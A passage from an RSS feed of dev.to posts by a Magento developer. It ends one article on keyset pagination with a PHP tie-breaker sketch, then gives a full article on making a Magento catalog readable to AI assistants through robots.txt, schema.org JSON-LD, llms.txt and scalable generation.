&lt;p&gt;It is &lt;em&gt;not&lt;/em&gt; the right tool when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;You need to jump to an arbitrary page.&lt;/strong&gt; Keyset pagination is sequential — to load page 50 you need the cursor value from page 49. There is no way to compute "the row just after position 49,000" without walking there first. Storefront product listings where a user clicks "page 27" directly still need OFFSET.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The sort column is not the primary key.&lt;/strong&gt; If users sort by price or name, duplicate values exist (two products at €9.99), so the cursor needs a deterministic tie-breaker. The &lt;code&gt;WHERE&lt;/code&gt; clause becomes a pair: &lt;code&gt;WHERE (price, entity_id) &amp;gt; (:lastPrice, :lastId)&lt;/code&gt;. It works and it is still fast, but the SQL is longer and the index needs to cover both columns in the right order.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The table is small.&lt;/strong&gt; Under a few thousand rows, OFFSET cost is lost in the noise. Stick with the default collection; the extra complexity is not worth it.&lt;/li&gt;
&lt;/ul&gt;
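
&lt;p&gt;The tie-breaker case is easier to see with data. This sketch mimics the row comparison &lt;code&gt;(price, entity_id) &amp;gt; (:lastPrice, :lastId)&lt;/code&gt; in plain PHP, on a handful of made-up rows already sorted by price and then ID. &lt;code&gt;nextPage()&lt;/code&gt; is a hypothetical helper, and in production the comparison belongs in SQL, not in PHP:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

// Made-up rows, as if returned by ORDER BY price ASC, entity_id ASC.
$rows = [
    ['entity_id' =&gt; 4, 'price' =&gt; 5.00],
    ['entity_id' =&gt; 2, 'price' =&gt; 9.99],
    ['entity_id' =&gt; 7, 'price' =&gt; 9.99],
    ['entity_id' =&gt; 1, 'price' =&gt; 12.50],
];

/** Rows strictly after the cursor: price first, entity_id breaks ties. */
function nextPage(array $rows, float $lastPrice, int $lastId, int $limit): array
{
    $after = array_filter(
        $rows,
        static fn (array $row): bool =&gt;
            ([$row['price'], $row['entity_id']] &lt;=&gt; [$lastPrice, $lastId]) &gt; 0
    );

    return array_slice(array_values($after), 0, $limit);
}

// The previous page ended on the first 9.99 product (entity_id 2).
$page = nextPage($rows, 9.99, 2, 2);
echo implode(',', array_column($page, 'entity_id')), PHP_EOL; // 7,1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With a cursor on price alone, the second 9.99 product would be skipped or repeated. The ID in the pair is what keeps it in the result exactly once.&lt;/p&gt;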

&lt;h2&gt;
  
  
  The one-line version
&lt;/h2&gt;

&lt;p&gt;Use &lt;code&gt;WHERE pk &amp;gt; :lastId ORDER BY pk ASC LIMIT n&lt;/code&gt; instead of &lt;code&gt;OFFSET&lt;/code&gt;, and &lt;code&gt;yield&lt;/code&gt; your batches from a generator function. Your catalog loops will stop slowing down as the catalog grows.&lt;/p&gt;

&lt;p&gt;Source for the module that uses this technique: &lt;a href="https://github.com/iamrobindhiman/magento2-module-llms-txt" rel="noopener noreferrer"&gt;github.com/iamrobindhiman/magento2-module-llms-txt&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.php.net/manual/en/language.generators.overview.php" rel="noopener noreferrer"&gt;PHP: Generators overview&lt;/a&gt; — the official PHP docs on &lt;code&gt;yield&lt;/code&gt; and generator functions&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://use-the-index-luke.com/no-offset" rel="noopener noreferrer"&gt;We need tool support for keyset pagination&lt;/a&gt; by Markus Winand — the canonical argument against OFFSET, with SQL examples&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.mysql.com/doc/refman/8.0/en/limit-optimization.html" rel="noopener noreferrer"&gt;MySQL: Optimizing LIMIT queries&lt;/a&gt; — how MySQL handles LIMIT and OFFSET internally&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
    </item>
    <item>
      <title>Is your Magento store legible to AI assistants?</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Sun, 14 Jun 2026 12:54:08 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/is-your-magento-store-legible-to-ai-assistants-3f3m</link>
      <guid>https://dev.to/iamrobindhiman/is-your-magento-store-legible-to-ai-assistants-3f3m</guid>
      <description>&lt;p&gt;Ask ChatGPT or Claude for "a waterproof hiking watch with a barometer under 200" and you don't get ten blue links. You get a shortlist, with reasons. For a growing slice of shoppers, that shortlist &lt;em&gt;is&lt;/em&gt; the storefront. They never reach a category page. Which raises an uncomfortable question for anyone running a catalog: when an assistant builds that list, is your store on it?&lt;/p&gt;

&lt;p&gt;On Shopify, answering that is increasingly the platform's job. Shopify now ships an Agentic Storefronts page in the admin that feeds your catalog into AI channels like ChatGPT and Copilot, then reports which queries you surface for. You can argue about how well it works, but it's native: a toggle. On Magento there is no toggle. If you want a Magento store to be legible to an AI assistant, that's on you to build.&lt;/p&gt;

&lt;p&gt;I spent the last few months building exactly that: a module that exposes a Magento catalog to AI crawlers and assistants. The work sorts cleanly into four layers. None of them are exotic. Most stores are missing all four.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 1: Let the crawlers in, deliberately
&lt;/h2&gt;

&lt;p&gt;AI assistants are fed two ways: live retrieval at question time, and index crawls ahead of time. Both arrive as bots with their own user agents, such as GPTBot (OpenAI), ClaudeBot (Anthropic), and PerplexityBot, plus control tokens like Google-Extended, which Google's existing crawlers honor instead of sending a separate bot. The list keeps growing.&lt;/p&gt;

&lt;p&gt;Magento doesn't ship an opinion about any of them. Your &lt;code&gt;robots.txt&lt;/code&gt; was written for Googlebot in a world that no longer exists. Step one is a decision, not code: which assistants are you willing to be read by, and have you actually said so? The mistake I see most is stores that block everything non-Google by reflex, then wonder why they're absent from AI answers.&lt;/p&gt;
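
&lt;p&gt;One way to check that a policy says what you think it says is to parse it before deploying. The sketch below uses Python's standard &lt;code&gt;urllib.robotparser&lt;/code&gt;. The rules, the &lt;code&gt;shop.example&lt;/code&gt; host, and the &lt;code&gt;allowed&lt;/code&gt; helper are assumptions for illustration, not a recommended policy:&lt;/p&gt;

```python
from urllib.robotparser import RobotFileParser

# Hypothetical policy: let two AI crawlers read the catalog, keep checkout and
# account pages private for everyone. Disallow lines come before "Allow: /"
# because Python's parser takes the first matching rule, while some crawlers
# take the longest match; this ordering gives the same answer under both.
ROBOTS_TXT = """\
User-agent: GPTBot
User-agent: ClaudeBot
Disallow: /checkout/
Disallow: /customer/
Allow: /

User-agent: *
Disallow: /checkout/
Disallow: /customer/
"""


def allowed(agent, path):
    """Return True if `agent` may fetch `path` under ROBOTS_TXT."""
    parser = RobotFileParser()
    parser.parse(ROBOTS_TXT.splitlines())
    return parser.can_fetch(agent, "https://shop.example" + path)


for agent in ("GPTBot", "ClaudeBot", "SomeOtherBot"):
    print(agent, allowed(agent, "/hiking-watch.html"), allowed(agent, "/checkout/cart/"))
```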

&lt;h2&gt;
  
  
  Layer 2: Give them machine-readable facts
&lt;/h2&gt;

&lt;p&gt;A human reads "Was 180, now 140." A model inferring price, currency, and availability from rendered HTML gets it wrong often enough to drop you from a comparison.&lt;/p&gt;

&lt;p&gt;This is where &lt;code&gt;schema.org&lt;/code&gt; Product structured data earns its keep: JSON-LD with &lt;code&gt;price&lt;/code&gt;, &lt;code&gt;priceCurrency&lt;/code&gt;, &lt;code&gt;availability&lt;/code&gt;, &lt;code&gt;gtin&lt;/code&gt;, &lt;code&gt;brand&lt;/code&gt;. Magento emits &lt;em&gt;some&lt;/em&gt; structured data, but coverage is partial and theme-dependent. Hyvä, Luma, and every custom frontend handle it differently. The fix is unglamorous: audit what your product pages actually output as JSON-LD, and fill the gaps. Structured data was an SEO nicety for a decade. For machine readers it's the difference between a fact and a guess.&lt;/p&gt;
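
&lt;p&gt;For reference while auditing, here is roughly what a complete Product document looks like, built in Python so the nesting is explicit. Price, currency, and availability live on a nested &lt;code&gt;Offer&lt;/code&gt; in the schema.org vocabulary. The &lt;code&gt;product_jsonld&lt;/code&gt; helper and every product value (name, SKU, GTIN, brand) are made up for the example:&lt;/p&gt;

```python
import json


def product_jsonld(name, sku, gtin, brand, price, currency, in_stock):
    """Build a schema.org Product document with one nested Offer."""
    availability = "InStock" if in_stock else "OutOfStock"
    return {
        "@context": "https://schema.org",
        "@type": "Product",
        "name": name,
        "sku": sku,
        "gtin": gtin,
        "brand": {"@type": "Brand", "name": brand},
        "offers": {
            "@type": "Offer",
            # A plain decimal string, with the currency in its own field.
            "price": f"{price:.2f}",
            "priceCurrency": currency,
            "availability": f"https://schema.org/{availability}",
        },
    }


# Placeholder product data, not a real catalog entry.
doc = product_jsonld(
    "Ridge Barometer Watch", "RBW-01", "00012345678905", "Ridge", 140, "EUR", True
)
print(json.dumps(doc, indent=2))
```

&lt;p&gt;The "Was 180, now 140" ambiguity disappears: the machine reader gets one price, one currency code, and an explicit availability URL, with nothing to infer from the rendered markup.&lt;/p&gt;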

&lt;h2&gt;
  
  
  Layer 3: Publish a map: llms.txt
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://llmstxt.org/" rel="noopener noreferrer"&gt;llms.txt&lt;/a&gt; is a proposed convention: a single Markdown file at your domain root that tells an assistant, in plain prose, what lives here and where the canonical version is. Think of it as a &lt;code&gt;robots.txt&lt;/code&gt; written for comprehension instead of permission.&lt;/p&gt;

&lt;p&gt;I'm deliberately measured about this one. Adoption is early, no assistant &lt;em&gt;guarantees&lt;/em&gt; it reads your file, and anyone selling it as a ranking trick is overselling. But the cost is low and the logic is sound: when a model chooses what to retrieve, a clean Markdown summary of your catalog is far cheaper to parse than crawling a few thousand JavaScript-heavy product pages. You're doing the model's summarising for it, in your own words.&lt;/p&gt;
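
&lt;p&gt;To make the shape concrete, here is a small Python sketch that renders the layout the llms.txt proposal describes: an H1 title, a blockquote summary, then H2 sections of annotated links. The &lt;code&gt;render_llms_txt&lt;/code&gt; function, the store name, and the URLs are all hypothetical:&lt;/p&gt;

```python
def render_llms_txt(store_name, summary, sections):
    """Render llms.txt Markdown: H1 title, blockquote summary, H2 link lists."""
    lines = [f"# {store_name}", "", f"> {summary}"]
    for heading, links in sections.items():
        lines += ["", f"## {heading}", ""]
        for title, url, note in links:
            lines.append(f"- [{title}]({url}): {note}")
    return "\n".join(lines) + "\n"


# Placeholder store data for illustration only.
text = render_llms_txt(
    "Example Outdoor Store",
    "Hiking watches and navigation gear, shipped within the EU.",
    {
        "Categories": [
            ("Hiking watches", "https://shop.example/hiking-watches", "GPS and barometer models"),
        ],
        "Policies": [
            ("Shipping and returns", "https://shop.example/shipping", "delivery times and return window"),
        ],
    },
)
print(text)
```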

&lt;h2&gt;
  
  
  Layer 4: Scale (and why Magento makes it hard)
&lt;/h2&gt;

&lt;p&gt;Here it stops being a checklist and becomes engineering. A real catalog is 20k, 70k, 200k products. You can't dump all of it into one file, and you can't generate it by walking the catalog with naive &lt;code&gt;setCurPage()&lt;/code&gt; pagination. That approach quietly falls off a performance cliff at depth. Generating an llms.txt or a machine feed for a large Magento store means keyset iteration, real curation (your best sellers and category structure, not every SKU), and incremental regeneration so you're not rebuilding everything on each cron tick.&lt;/p&gt;

&lt;p&gt;That's the real reason this layer is missing from most stores: layers 1–3 are configuration, but layer 4 is a module someone has to write and keep correct as the catalog moves.&lt;/p&gt;

&lt;h2&gt;
  
  
  The honest summary
&lt;/h2&gt;

&lt;p&gt;This is early. The standards aren't settled, the assistants change behaviour monthly, and nobody can promise you a number. So don't treat AI discoverability as a growth hack; treat it as cheap table stakes you can get ahead of.&lt;/p&gt;

&lt;p&gt;The platforms are already drawing the line. Shopify is making catalog-to-AI a built-in feature. Magento, true to form, hands you the primitives and a clean architecture and expects you to assemble the rest. That's annoying. It's also the opening. The Magento stores legible to assistants in 2026 won't be the ones that waited for a toggle. They'll be the ones whose team treated it as four small problems and shipped them.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>ai</category>
      <category>ecommerce</category>
      <category>seo</category>
    </item>
  </channel>
</rss>
